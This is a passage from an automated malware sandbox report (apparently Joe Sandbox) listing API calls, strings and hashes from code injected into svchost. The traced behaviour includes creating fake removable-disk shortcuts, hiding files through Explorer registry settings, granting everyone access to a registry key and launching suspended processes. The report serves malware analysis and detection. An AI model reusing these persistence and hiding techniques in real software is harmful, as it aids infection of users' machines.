            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001E2763
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E276D
            • CloseHandle.KERNEL32(00000000), ref: 001E2770
            • RegQueryValueExW.ADVAPI32(?,ImageBase,00000000,00000000,00000000,00000000), ref: 001E27A5
            • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 001E27BE
            • RegQueryValueExW.ADVAPI32(?,ImageBase,00000000,00000000,00000000,00000000), ref: 001E27E6
            • wsprintfW.USER32 ref: 001E27FB
            • DeleteFileW.KERNEL32(?,00000000,00000000,?), ref: 001E280D
            • SetFileAttributesW.KERNEL32(?,00000080), ref: 001E281F
            • DeleteFileW.KERNEL32(?), ref: 001E282C
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E2844
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E285E
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E286C
            • CloseHandle.KERNEL32(00000000), ref: 001E2873
            • RegCloseKey.ADVAPI32(?), ref: 001E2880
            • wsprintfW.USER32 ref: 001E28CE
            • wsprintfW.USER32 ref: 001E2901
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: File$Virtual$Delete$wsprintf$CloseFreeQueryValueWrite$AllocAttributesCreateHandle$_rand$__getptd_memset
            • String ID: %s\Removable Disk (%I64uGB).lnk$%s\Thumbs.db$%s\desktop.ini$%s\~$W%s.FAT$DOS_STUB$ImageBase
            • API String ID: 3531569036-3179335881
            • Opcode ID: 878affd53dbddeca07af37a2e962edfd50ca80ce4baab6d7086779a4b1d4dc65
            • Instruction ID: a0cbaf8dcc6da57c826e4db33383138a997d16ba37f4e7c6b159b017f1a7cdef
            • Opcode Fuzzy Hash: 878affd53dbddeca07af37a2e962edfd50ca80ce4baab6d7086779a4b1d4dc65
            • Instruction Fuzzy Hash: 99B172B1A40758ABDB34DBA1DC99FEE777CAF54700F404584F609AA180DAB1AE84CF64
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4435
            • __mtterm.LIBCMT ref: 001E4441
              • Part of subcall function 001E410C: DecodePointer.KERNEL32(00000003,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E411D
              • Part of subcall function 001E410C: TlsFree.KERNEL32(0000001A,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4137
              • Part of subcall function 001E410C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E6668
              • Part of subcall function 001E410C: _free.LIBCMT ref: 001E666B
              • Part of subcall function 001E410C: DeleteCriticalSection.KERNEL32(0000001A,?,?,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E6692
            • GetProcAddress.KERNEL32(00000000,FlsAlloc,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4457
            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4464
            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4471
            • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E447E
            • TlsAlloc.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E44CE
            • TlsSetValue.KERNEL32(00000000,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E44E9
            • __init_pointers.LIBCMT ref: 001E44F3
            • EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4504
            • EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4511
            • EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E451E
            • EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E452B
            • DecodePointer.KERNEL32(Function_00004290,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E454C
            • __calloc_crt.LIBCMT ref: 001E4561
            • DecodePointer.KERNEL32(00000000,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E457B
            • GetCurrentThreadId.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E458D
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
            • API String ID: 3698121176-3819984048
            • Opcode ID: 840a4098ebebfe11d3f4458dfb944d17afaed95ee1e87cd3b4aaf04abfec8d0a
            • Instruction ID: f173f9f5275e82815425cdd6f10f8d8052b25aca1d5de320daa002fa4c6e32eb
            • Opcode Fuzzy Hash: 840a4098ebebfe11d3f4458dfb944d17afaed95ee1e87cd3b4aaf04abfec8d0a
            • Instruction Fuzzy Hash: D6316271900BE19BDB20AFF6AD89A4D3FE4AB5C7207240916F4189BAB0DF70A4C1CF54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 001E40C6: RtlEncodePointer.NTDLL(00000000,001E837C,001EEF00,00000314,00000000,?,?,?,?,?,001E7A4F,001EEF00,Microsoft Visual C++ Runtime Library,00012010), ref: 001E40C8
            • LoadLibraryW.KERNEL32(USER32.DLL,001EEF00,00000314,00000000), ref: 001E8391
            • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001E83AD
            • EncodePointer.KERNEL32(00000000), ref: 001E83BE
            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 001E83CB
            • EncodePointer.KERNEL32(00000000), ref: 001E83CE
            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 001E83DB
            • EncodePointer.KERNEL32(00000000), ref: 001E83DE
            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 001E83EB
            • EncodePointer.KERNEL32(00000000), ref: 001E83EE
            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 001E83FF
            • EncodePointer.KERNEL32(00000000), ref: 001E8402
            • DecodePointer.KERNEL32(?,001EEF00,00000314,00000000), ref: 001E8424
            • DecodePointer.KERNEL32 ref: 001E842E
            • DecodePointer.KERNEL32(?,001EEF00,00000314,00000000), ref: 001E846D
            • DecodePointer.KERNEL32(?), ref: 001E8487
            • DecodePointer.KERNEL32(001EEF00,00000314,00000000), ref: 001E849B
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
            • API String ID: 1951731885-564504941
            • Opcode ID: 49b6e680087740f1b7c30df360f08562897658f1ac3377b78e195aae1240b24a
            • Instruction ID: ba9ac9d3a2ccf14b1aaf537a22496dd56693754792234b6044669f441b15e2fb
            • Opcode Fuzzy Hash: 49b6e680087740f1b7c30df360f08562897658f1ac3377b78e195aae1240b24a
            • Instruction Fuzzy Hash: 46412C7190179BAACF20DFF69D85A6E7BA8EF84300F550429E909E7190EB74D941CA60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00021D04
            • lstrcpy.KERNEL32(?,software\microsoft), ref: 00021D1C
            • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,software\microsoft,00000000,00008000,00001000,00000004), ref: 00021D3A
            • RegEnumValueW.ADVAPI32(?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00021D5B
            • RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021D71
            • RegCloseKey.ADVAPI32(?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021D7B
            • lstrcpy.KERNEL32(?,?), ref: 00021D89
            • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021DA7
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,00022D23,00000000), ref: 00021DC1
            • RegSetKeySecurity.ADVAPI32(?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021DCE
            • RegCloseKey.ADVAPI32(?,?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000), ref: 00021DD6
            • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004,00022D23,?,00000000,00000000,00000000), ref: 00021DF4
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004), ref: 00021E18
            • RegDeleteValueW.ADVAPI32(?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?), ref: 00021E26
            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?), ref: 00021E39
            • CloseHandle.KERNEL32(?), ref: 00021E44
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021E51
            • DeleteFileW.KERNEL32(?,?,00000080,?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021E59
            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021E68
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: CloseValue$CreateDeleteSecurity$DescriptorFileVirtuallstrcpy$AllocAttributesConvertEnumFreeHandleQueryString
            • String ID: D:(A;;KA;;;WD)$software\microsoft
            • API String ID: 2404269020-2933255985
            • Opcode ID: b1836ad5dda5fe3f68145f66cd1a53c925db323f158cb1440ff89ee1a73d0fe1
            • Instruction ID: fd3e399d17c46af67c1413c994a177e2eca4e8ac3beefc90bf2e484501139d44
            • Opcode Fuzzy Hash: b1836ad5dda5fe3f68145f66cd1a53c925db323f158cb1440ff89ee1a73d0fe1
            • Instruction Fuzzy Hash: 08411271950118BEFF65ABD0ED47FEEBA79EB14700F204164B610740A2EBB56F24AB24
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00022741
            • lstrcpy.KERNEL32(00022DB2,software\microsoft), ref: 0002275B
            • RegOpenKeyExA.ADVAPI32(00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000,00001000,00000004), ref: 00022774
            • RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000), ref: 000227A7
            • RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000227C4
            • RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000), ref: 000227D5
            • lstrcpy.KERNEL32(00022DB2,?), ref: 000227E9
            • RegOpenKeyExA.ADVAPI32(00022DB2,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000), ref: 00022802
            • lstrcpyW.KERNEL32(00022DB2,00022DB2), ref: 0002281E
            • RegQueryValueExW.ADVAPI32(?,00022DB2,00000000,00000000,00022DB2,00008000,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F,00000000), ref: 0002283B
            • RegCloseKey.ADVAPI32(?,?,00022DB2,00000000,00000000,00022DB2,00008000,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F), ref: 00022843
            • CreateProcessW.KERNEL32(00000000,00022DB2,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00022870
            • CloseHandle.KERNEL32(00000000), ref: 0002287F
            • ResumeThread.KERNEL32(?,00000000,00022DB2,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,00022DB2,00000000,00000000), ref: 00022887
            • CloseHandle.KERNEL32(?), ref: 0002288F
            • CloseHandle.KERNEL32(?), ref: 00022897
            • VirtualFree.KERNEL32(00022DB2,00000000,00008000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000,00001000,00000004), ref: 000228AD
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Close$HandleValuelstrcpy$OpenVirtual$AllocCreateDeleteEnumFreeProcessQueryResumeThread
            • String ID: D$software\microsoft
            • API String ID: 1501828479-114866630
            • Opcode ID: 152ca32bf0f47ef9c1514464321a736f10773b14d29309644bdf743d37a2e0ed
            • Instruction ID: f8c24cb6b35a898df1d4813da9c657cc120b58fcb0cc90411a5deb29140ecdac
            • Opcode Fuzzy Hash: 152ca32bf0f47ef9c1514464321a736f10773b14d29309644bdf743d37a2e0ed
            • Instruction Fuzzy Hash: A841F071914229BAEF61DBD0DD42FEEBBB9FF04704F200025F610B50A2DB759A54AF24
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00022623
            • ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022640
            • SetCurrentDirectoryW.KERNEL32(00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022648
            • lstrcpy.KERNEL32(00022DA8,software\microsoft), ref: 00022657
            • RegOpenKeyExA.ADVAPI32(00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022670
            • RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%), ref: 0002269F
            • GetModuleHandleW.KERNEL32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000,00000000), ref: 000226B9
            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000226C3
            • DeleteFileW.KERNEL32(?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000226CC
            • RegDeleteValueW.ADVAPI32(?,?,?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F), ref: 000226D8
            • RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8), ref: 000226E9
            • GetSystemDirectoryW.KERNEL32(00022DA8,00008000), ref: 000226FD
            • SetCurrentDirectoryW.KERNEL32(00022DA8,00022DA8,00008000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000), ref: 00022705
            • VirtualFree.KERNEL32(00022DA8,00000000,00008000,00022DA8,00022DA8,00008000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000), ref: 00022714
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Directory$CurrentDeleteFreeValueVirtual$AllocCloseEnumEnvironmentExpandFileHandleLibraryModuleOpenStringsSystemlstrcpy
            • String ID: %allusersprofile%$software\microsoft
            • API String ID: 3835630320-3330974064
            • Opcode ID: a9d667bc77a146274c428bcacb8782486d52b11106f23bbb5924c04426bdb8c7
            • Instruction ID: 216f85cd24a5a054f3c930f3d83a650878cc10b388fc99c524ffcbb043796af3
            • Opcode Fuzzy Hash: a9d667bc77a146274c428bcacb8782486d52b11106f23bbb5924c04426bdb8c7
            • Instruction Fuzzy Hash: CD31EE7194022DBAEF61EBD0EE86FEEB7B9BF04704F200471B610B50E2DB759A549B14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 001E12F7
            • GetProcAddress.KERNEL32(00000000), ref: 001E12FE
            • GetCurrentProcess.KERNEL32(00000000), ref: 001E1311
            • RegOpenKeyExW.ADVAPI32 ref: 001E1344
            • RegSetValueExW.ADVAPI32 ref: 001E1372
            • RegSetValueExW.ADVAPI32 ref: 001E1387
            • RegCloseKey.ADVAPI32(001E11BC), ref: 001E138D
            • SendMessageW.USER32(0000FFFF,00000111,00007103,00000000), ref: 001E13A4
            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 001E13B5
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: Value$AddressChangeCloseCurrentHandleMessageModuleNotifyOpenProcProcessSend
            • String ID: Hidden$IsWow64Process$ShowSuperHidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced$kernel32
            • API String ID: 382038999-650040310
            • Opcode ID: 6a2e2bbc82746c950bfe34099b7036c3e933afe439e958edbac9866195426133
            • Instruction ID: d8aa73289f7e9e3324cfba329b08d3d783e8ddafd7288b93a0b4c7d869f3d191
            • Opcode Fuzzy Hash: 6a2e2bbc82746c950bfe34099b7036c3e933afe439e958edbac9866195426133
            • Instruction Fuzzy Hash: 13216D75B80388BBEB20DBE5DD8AF9D777CAB04B11F600459B701AA5C0D7F06A84CB55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • wsprintfW.USER32 ref: 001E1844
            • wsprintfW.USER32 ref: 001E1859
            • wsprintfW.USER32 ref: 001E187B
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1887
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1899
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E18A6
            • wsprintfW.USER32 ref: 001E1930
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E193C
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E194E
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E195B
            • lstrcmpiW.KERNEL32(?,.LNK,?,?,?,?,001E121A), ref: 001E1988
            • wsprintfW.USER32 ref: 001E19A8
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19B4
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E19C6
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19D3
            • lstrcmpiW.KERNEL32(?,.INF,?,?,?,?,001E121A), ref: 001E19FC
            • lstrcmpiW.KERNEL32(?,.INI,?,?,?,?,001E121A), ref: 001E1A2C
            • wsprintfW.USER32 ref: 001E1A8A
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1A96
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AAC
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AB9
            • wsprintfW.USER32 ref: 001E1B19
            • SetFileAttributesW.KERNEL32(?,00000006,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B27
            • FindNextFileW.KERNEL32(?,?,?,001E121A), ref: 001E1B3B
            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B4A
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: File$Delete$wsprintf$Attributes$lstrcmpi$Find$CloseNext
            • String ID: %s%s$%s.exe$%s\%s
            • API String ID: 1943899752-352409262
            • Opcode ID: c06b870d34b259d5ec8c832cc323e1964a9c3f665609999970a34330b140c2ae
            • Instruction ID: 7338fc12e7afa52b59e17137bf6f5f220e8634f06bed42808c3723b7771d96d7
            • Opcode Fuzzy Hash: c06b870d34b259d5ec8c832cc323e1964a9c3f665609999970a34330b140c2ae
            • Instruction Fuzzy Hash: 19411772D00A99B6DB24ABA2CC45BEE7379FF24744F854095D90AA7100F732DEC9CB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CoInitialize.OLE32(00000000), ref: 001E2C28
            • CoCreateInstance.OLE32(001E922C,00000000,00000001,001E921C,?), ref: 001E2C48
            • CoUninitialize.OLE32 ref: 001E2CFA
            • CoUninitialize.OLE32 ref: 001E2D28
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: Uninitialize$CreateInitializeInstance
            • String ID: rundll32$shell32.dll
            • API String ID: 1968832861-599609437
            • Opcode ID: 65bb4fce0c7e3338dbc9d5c83469f725f212812a6d4ed0e6bec0c7fa1e7c59be
            • Instruction ID: 51d21a5a23f6e83a5c22249d9df92a206a07311a6179bc64b7d117a9608aec5f
            • Opcode Fuzzy Hash: 65bb4fce0c7e3338dbc9d5c83469f725f212812a6d4ed0e6bec0c7fa1e7c59be
            • Instruction Fuzzy Hash: B241B779740604AFDB00EBA9CC85F5EB3B9AF8D704F208584EA09DB3A5D675ED02DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020006,00000000,?,00000000,00000004), ref: 00021E94
            • wsprintfW.USER32 ref: 00021EAC
            • RegSetValueExW.ADVAPI32(?,00000004,00000000,00000003,?,?,?,00000000,00000004), ref: 00021EC9
            • RegCloseKey.ADVAPI32(?,?,00000004,00000000,00000003,?,?,?,00000000,00000004), ref: 00021ED1
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: CloseCreateValuewsprintf
            • String ID: %08X$software\microsoft
            • API String ID: 4211343355-153170398
            • Opcode ID: 06e26063515e8221a9a461022c38cc6d44f0f697e1f06d1329ee02f2536c984c
            • Instruction ID: 9f197e028462865b8a6f20695c78ae5a1ed8b6f537ff0be786811003c0aea341
            • Opcode Fuzzy Hash: 06e26063515e8221a9a461022c38cc6d44f0f697e1f06d1329ee02f2536c984c
            • Instruction Fuzzy Hash: 4CF0A472510218BFEF14EB90EC97EEF776DEB14700F100124BA0199092F6A6EF109770
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,001EB1A0,00000008,001E4251,00000000,00000000,?,001E4AD9,00000000,00000001,00000000,?,001E6706,00000018,001EB230,0000000C), ref: 001E415A
            • __lock.LIBCMT ref: 001E418E
              • Part of subcall function 001E677B: __mtinitlocknum.LIBCMT ref: 001E6791
              • Part of subcall function 001E677B: __amsg_exit.LIBCMT ref: 001E679D
              • Part of subcall function 001E677B: EnterCriticalSection.KERNEL32(00000000,00000000,?,001E4321,0000000D,001EB1C8,00000008,001E4418,00000000,?,001E3259,00000000,001EB100,00000008,001E32BE,?), ref: 001E67A5
            • InterlockedIncrement.KERNEL32(?), ref: 001E419B
            • __lock.LIBCMT ref: 001E41AF
            • ___addlocaleref.LIBCMT ref: 001E41CD
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
            • String ID: KERNEL32.DLL
            • API String ID: 637971194-2576044830
            • Opcode ID: 7746abcb76655ebcaef7616bc7aa8dce58e8a96c7b73cfe04d29033e8195d8b6
            • Instruction ID: 1db759abc6b6338815a2828e5a7979294e97a54e3f694cf5cf838b4d0a7e5d22
            • Opcode Fuzzy Hash: 7746abcb76655ebcaef7616bc7aa8dce58e8a96c7b73cfe04d29033e8195d8b6
            • Instruction Fuzzy Hash: EF015BB1841F809FDB209FA6D84670EFBF0AF20725F50890EE495966A1CBB4A685CF11
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __getptd.LIBCMT ref: 001E38D8
              • Part of subcall function 001E4276: __getptd_noexit.LIBCMT ref: 001E4279
              • Part of subcall function 001E4276: __amsg_exit.LIBCMT ref: 001E4286
            • __amsg_exit.LIBCMT ref: 001E38F8
            • __lock.LIBCMT ref: 001E3908
            • InterlockedDecrement.KERNEL32(?), ref: 001E3925
            • _free.LIBCMT ref: 001E3938
            • InterlockedIncrement.KERNEL32(002317A8), ref: 001E3950
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
            • String ID:
            • API String ID: 3470314060-0
            • Opcode ID: 486543b36bc22eefedf567bf4d430d0573bcb597a3cf54fc02cedf25875093f5
            • Instruction ID: 33ff777d50cc44d80b01616e59ee755baaa719c371358c53d7db84180f9ec449
